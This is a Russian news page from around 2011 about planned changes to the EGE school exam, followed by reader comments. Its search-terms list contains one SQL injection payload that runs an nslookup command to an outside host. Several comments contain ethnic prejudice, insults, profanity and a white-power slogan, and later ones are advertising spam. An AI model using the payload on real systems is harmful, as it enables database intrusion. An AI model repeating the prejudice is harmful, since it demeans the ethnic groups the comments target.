Последние новости
Новости образования /

Скоро ожидаются перемены в ЕГЭ

Выпускники следующих двух лет могут начинать готовиться к переменам в тестах единого государственного экзамена, теперь они начнут усложняться, особенно это коснется технической части тестов.

Так, к примеру, в ЕГЭ по русскому теперь будут проверяться двумя независимыми экспертами для полного исключения ошибок. Перемены коснуться так же иностранных языков, естественных наук и истории. Но это случится лишь через два года так, как потребуется время для их подготовить.

Уже в в 2012 году часть экзамена по истории будет представлять собой эссе, в иностранные языки включить «произношение», а физика и химия будет сдаваться на опытах. Так что репетитор по английскому языку станет восстребованной специальностью в будущем учебном году.

Еще в прошлом году в ЕГЭ были внесены поправки – в математике, которая состояла из трех частей оставили две: первая предназначена для всех выпускников и ее сдача необходима для получения аттестата, а вторая часть про усложнится. Теперь она будет предназначаться для тех, кто поступает в технические ВУЗы.

Но эксперты в один голося говорят, что заявленные изменения помогут только увеличить процент субъективных оценок и коррупции.

Колоссально изменится тест по русскому языку. Теперь он будет проверяться еще строже и внимательнее, особенна та часть, где нужно написать сочинение-рассуждение на заданную тему. И проверять в этом году ее уже будут два независимых эксперта. Ввели его чтобы усилить контроль.

С 2012 изменения коснутся и заданий по истории. В планах превратить часть теста в эссе, где будут объединены несколько вопросов, но по одному временному периоду. Появится у выпускников и возможность выбора темы из нескольких предложенных. В отличие от двух первых частей, которые содержат объективные вопросы, в третьей части будут задания, основанные не на фактах, а на точке зрения. Будут так же представлены вопросы на анализ ситуации и сравнение фактов и событий.

Как пояснил президент Всероссийского фонда образования Сергей Комков: "Введение формализованного эссе не нивелирует формальный подход единого госэкзамена. Для того чтобы оценить уровень владения данным предметом, как и в случае с литературой, принципиально важно наличие устной части экзамена. Причем по объему она должна быть куда больше, чем письменная".

Изменения в ЕГЭ по иностранным будет таким: появится разговорная часть, скорее всего это будет так же, как на классическом экзамене – нужно будет рассказать определенную тему. Но так, как выслушать нужно будет всех участников- третья часть будет проводиться отдельно, а баллы потом будут просто суммироваться.

Но по словам экспертов введение новшеств требует дополнительной подготовки. Но зато устная часть по иностранным языкам покажет раскрытые знания сдающих, но с другой стороны появится больше возможностей для коррупции. Кроме того большой проблемой буде разница в уровнях подготовки школ.

«Дело в том, что сегодня отсутствуют единые образовательные стандарты. Границы того, что является нормой, а что нет, крайне размыты», — отметил один из специалистов.

А вот сдача физики и химии перестанет быть устной – надо будет проводить опыты, так называемая, практическая часть.

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2266.1964.48440.1.bxss.me
  • testing
  • я дагестанка сочинение
  • сочинение я- дагестанка
  • Помагите мне писать сочинение"Я ДАГЕСТАНКА"
28 комментариев
Ученик / 7 февраля 2011 / 15:00
Смотрю все на много усложнится,но все же не могу понять для чего столько сложностей нужно,очередная дебильная идея,я в шоке
Катя / 7 февраля 2011 / 15:27
Этого следовало ожидать в нашей стране всегда делают все через (извиняюсь за ворожение) жопу та что не чего удивительного в этом нет (
Катя / 7 февраля 2011 / 15:32
Не будем гадать что да как,просто посмотрим к чему это все приведет,я думаю от этого не чего хорошего ждать не стоит в прочем как и всегда
Роман / 27 июня 2011 / 22:54
Екатерина вам ли не по барабану что будет в след. году, т.к. вы уже его сдали и поступаете в институт!)))
Ксения / 17 июля 2011 / 13:06
опять много жертв будут из-за этого егэ,вообще отменять его нужно что напридумывали ерунду всякую...раньше такого вообще не было...
Ольга / 22 июля 2011 / 21:17
Дорогие дети!
Научитесь сначала правильно писать элементарные слова, такие как \"ничего\", \"выражение\", \"намного\" и т.д. А уже потом рассуждать о прочих сложностях ЕГЭ!
Ольга / 12 августа 2011 / 21:42
Здравствуйте! Ребята, я в этом году сдавала ЕГЭ,могу сказать одно-не так сложно его сдавать,как сложнее понять, то о чем спрашивают!Безумно некорректно поставлены вопросы!А то что ЕГЭ покупается элементарно-это доказано и не одной мной. Просто безумно обидно,когда приходишь сдавать документы в ВУЗы, у тебя по русскому 82 балла, а у армянина(калмыка,чеченца,дагестанца и др.),который толком говорить не может, 100 баллов,хотите сказать,что он знает больше,чем мы русские?!. Так что стоит задуматься правительству,как ужесточить слежку над коррупцией.Парочку накажут,действительно накажут,думаю, другие не посмеют.
отец / 19 августа 2011 / 00:18
Уважаемые ребята, будущие выпускники! В любом случае учите, читайте и занимайтесь спортом, пробивайтесь в ВУЗы, РУССКИЕ помогайте РУССКИМ во всём, как это делают другие нации, изучайте Русскую культуру и Русские традиции, будте сильнее, берегите себя и своих близких. Удачи!
Кира / 23 августа 2011 / 14:41
нет...ну я прямо падаю!!!что вы заладили про "другие нации"?я ничего против ЕГЭ не имею,правильно что есть(Хотя страшно до дрожи в коленках).Я не русская,переехала сюда когда мне было 11. я почти не знала русский язык,а сейчас учусь лучше многих. Да и в классе у меня много таких как я, и все молодцы. И я уверена что они сдадут ЕГЭ,нежели многие РУССКИЕ.Не надо обобщать,русские тоже покупают и подкупают. Я ничего плохого не имею ввиду,я люблю Россию)
Татьяна / 30 августа 2011 / 22:09
Я что-то не пойму - у нас по истории примерно 50 баллов из 100 возможных в среднем по стране получают, куда же еще усложнять?
Камилла / 31 августа 2011 / 08:47
Лучше бы на ЕГЭ сотовые глушили. У нас одиннадцатиклассники в этом году поголовно пользовались мобильниками на экзамене. Спрашивается, зачем учить предмет, если его сдача превратилась в соревнование "кто более технически оснащён на ЕГЭ"?
Аноним / 20 сентября 2011 / 11:29
а правда ли что с1 октября введут 4 вступ.экзамен и в силу вступит приказ №86?!?!
Диана / 28 сентября 2011 / 15:57
Ольга,ты больная,русская идиотка!!!! Я дагестанка,Славу Аллаху!!!! И я закончила школу на золотую медаль..и так вот..знаю я русский и не только его на много лучше чем ты..прежде чем что-то писать про нерусских..подумай!!!ДУРА!! извините за грубость..
Анет / 30 сентября 2011 / 19:03
Диана, хорошо воспитанный человек никогда не позволит себе такого хамства в адрес другого человека, чтобы он там ни говорил.....(кстати Ольга не оскорбляла другие народы, а справедливо заметила, что люди другой национальности безусловно хуже знают русский язык и не потому, что они плохие, а потому что родной язык им действительно ближе). А с такими случаями я тоже сталкивалась неодноекратно, когда люди нерусской национальности покупают себе 100-бальные экзамены, потому что сами сдать хотя бы на 50 баллов не смогут!
Георгий / 12 октября 2011 / 15:12
Власть белым
Карина / 13 октября 2011 / 16:06
такие я вижу все умные....речь шла о ЕГЭ а вы перешли на национальности...
у меня в классе полно русских и нерусских так вот многие русские даже хуже знают свой родной язык чем нерусские
по одному барану стадо не судят
ирина / 27 октября 2011 / 18:53
Я вшоке!!! У нас действительно в России хотят чтобы ЕГЭ поменьше людей сдало как положенно, им нах.. рыботяги нужны чтобы на государство горбатилось больше!!! Уебки ебаные!!!!
Людмила / 10 ноября 2011 / 02:49
Дорогая Ольга от 22 июля! Которая покровительственно тыкает носом \"дорогих детей\" в их орфографические ошибки (что правда). Однако Ольга - а Вам не кажется, что авторы данной информационной страницы (заметьте, специализирующейся в Образовании), допускают орфографические ошибки, начиная со второго абзаца (см. \"Перемены коснуться так же иностранных языков\"). Смею заметить, что 1) в \"коснуться\" не надо образованному человеку \"ь\" писать, 2) \"так же \" в данном предложении должно бы писаться ВМЕСТЕ. СТЫДОБИЩА! И они смеют учить нас, как надо учиться?! эксперты... Что бы они получили по ЕГЭ?
Алекс / 11 ноября 2011 / 21:40
Ольга, к Вашему сведению, все жители республики Калмыкия говорят на РУССКОМ языке, т.к. он является для них основным так же, как и для всех русских. Не говорите глупостей, не позорьте себя.
mixa / 7 января 2012 / 17:46
даааа....... тяжело придётся
Настя / 17 января 2012 / 18:19
Нет, наше министерство образования как обычно... Сейчас они пишут про \\\"возможность введения\\\". Эта неопределенность продлится до конца февраля. А потом уже готовится некогда! Неужели нельзя опубликовывать все изменения в сентябре?! Ну или хотя бы в первом полугодии.
Веста / 5 марта 2012 / 12:36
Я думаю,что ЕГЭ для нас намного проще,нежели отвечать устно и уже,действительно,заучивая всю историю.Ольга,не позорь себя.Я из Калмыкии,"мой" русский на пять,к тому же мои одноклассники знают не хуже...Знания зависят не от национальности,а от уровня твоей образованности!К тому же,как не стыдно писать такое,живя в такой огромной многонациональной стране,где все мы должны уважать культуру ,обычаи друг друга.А "Власть белым"- вообще бредятина!
Ирина / 20 июня 2012 / 21:59
Диана, 28 сент! "Намного" пишется слитно в твоем посте. Кстати, после запятых надо ставить пробелы при наборе текста. Это изучают на уроках информатики. Пропущены запятые: "прежде чем что-то писать, ЗАПЯТАЯ..." Да липовая у тебя медаль, столько ошибок. И вся страна знает, что в вашем регионе много "покупных" ЕГЭ. Особенно после прочтения твоего поста.
Ирине / 9 июля 2012 / 21:15
Вы еще скажите , что у калмыки притесняют русских , не давая сдавать экзамены XDrn
Алина / 30 июля 2012 / 22:44
Кошмар((( С каждым годом все хуже и хуже....В россии без репетиторов не возможно сдать это ЕГЭ(((Времени вообще не хватает.. Почему за рубежом нет ЕГЭ, они просто изучают те предметы, которые им нужны для поступления......rn
Radikletty / 30 марта 2018 / 20:12
Мой вк radik_y2014 скайп kruzzor rnСоздаю крутые сайты любой сложности и копии лендингов rnМогу долго расписывать какой я молодец, сколько десятков лет у меня опыта в данной сфере, но я предпочитаю "воде" реальные факты.Поэтому хватит лирики, вот что я могу предложить: rn------------------------------------ rn1. Качество услуг на уровне ведущих компаний. rn--- rn2. Цены существенно ниже чем в компаниях (зачастую в разы). rn--- rn3. Постоянная доступность, готовность ответить на интересующие Вас вопросы (ну разве что не ночью), то есть не нужно писать письма и сутками ждать ответа. rn--- rn4. ГОТОВ ПРЕДОСТАВИТЬ ПОРТФОЛИО РЕАЛЬНЫХ РАБОТ. ПРОВЕРИТЬ МОЖНО ПРОСТО ПОЗВОНИВ ПО НОМЕРАМ, УКАЗАННЫМ НА САЙТАХ. rn--- rn5. Мой опыт работы в рекламном агентстве позволяет выделить ваш продукт среди конкурентов, что значительно повысит вашу прибыль от сайта в дальнейшем. rn--- rn6. Люблю креативить. Это можно увидеть в моих работах. rn--- rn7. При желании можно встретиться и побеседовать лично. rn--- rn8. Также могу предложить: SEO продвижение сайта, контекстную рекламу Я.Директ и SMM продвижение в социальных сетях rn--- rnЯ надеюсь, что первоначальной информации достаточно, ЗВОНИТЕ ;) rn------------------------------------- rnСайт-визитка, лендинг, лэндинг, landing page, интернет-магазин, портал, корпоративный сайт.
Radikletty / 23 июля 2018 / 10:48
Мой вк radik_y2014 скайп kruzzor rn rnМогу долго расписывать какой я молодец, сколько десятков лет у меня опыта в данной сфере, но я предпочитаю "воде" реальные факты.Поэтому хватит лирики, вот что я могу предложить: rn------------------------------------ rn rn1. Качество услуг на уровне ведущих компаний. rn--- rn2. Цены существенно ниже чем в компаниях (зачастую в разы). rn--- rn3. Постоянная доступность, готовность ответить на интересующие Вас вопросы (ну разве что не ночью), то есть не нужно писать письма и сутками ждать ответа. rn--- rn4. ГОТОВ ПРЕДОСТАВИТЬ ПОРТФОЛИО РЕАЛЬНЫХ РАБОТ. ПРОВЕРИТЬ МОЖНО ПРОСТО ПОЗВОНИВ ПО НОМЕРАМ, УКАЗАННЫМ НА САЙТАХ. rn--- rn5. Мой опыт работы в рекламном агентстве позволяет выделить ваш продукт среди конкурентов, что значительно повысит вашу прибыль от сайта в дальнейшем. rn--- rn6. Люблю креативить. Это можно увидеть в моих работах. rn--- rn7. При желании можно встретиться и побеседовать лично. rn--- rn8. Также могу предложить: SEO продвижение сайта, контекстную рекламу Я.Директ и SMM продвижение в социальных сетях rn--- rn9. Поддержка и администрирование, защита от спама действующего САЙТА/ интернет-магазина. rn--- rnЯ надеюсь, что первоначальной информации достаточно, ЗВОНИТЕ ;) rn------------------------------------- rnСайт-визитка, лендинг, лэндинг, landing page, интернет-магазин, портал, корпоративный сайт.
NeooRaf / 23 сентября 2019 / 08:56
Здесь вы можете заказать копию любого сайта под ключ, недорого и качественно, при этом не тратя свое время на различные программы и фриланс-сервисы. rn rnКлонированию подлежат сайты как на конструкторах, так и на движках: rn- Tilda (Тильда) rn- Wix (Викс) rn- Joomla (Джумла) rn- Wordpress (Вордпресс) rn- Bitrix (Битрикс) rnи т.д. rnтелефон 8-996-725-20-75 звоните пишите viber watsapp rnКопируются не только одностраничные сайты на подобии Landing Page, но и многостраничные. Создается полная копия сайта и настраиваются формы для отправки заявок и сообщений. Кроме того, подключается админка (админ панель), позволяющая редактировать код сайта, изменять текст, загружать изображения и документы. rn rnЗдесь вы получите весь комплекс услуг по копированию, разработке и продвижению сайта в Яндексе и Google. rn rnХотите узнать сколько стоит сделать копию сайта? rnнапишите нам rn8-996-725-20-75 звоните пишите viber watsapp
имя


Популярые сообщения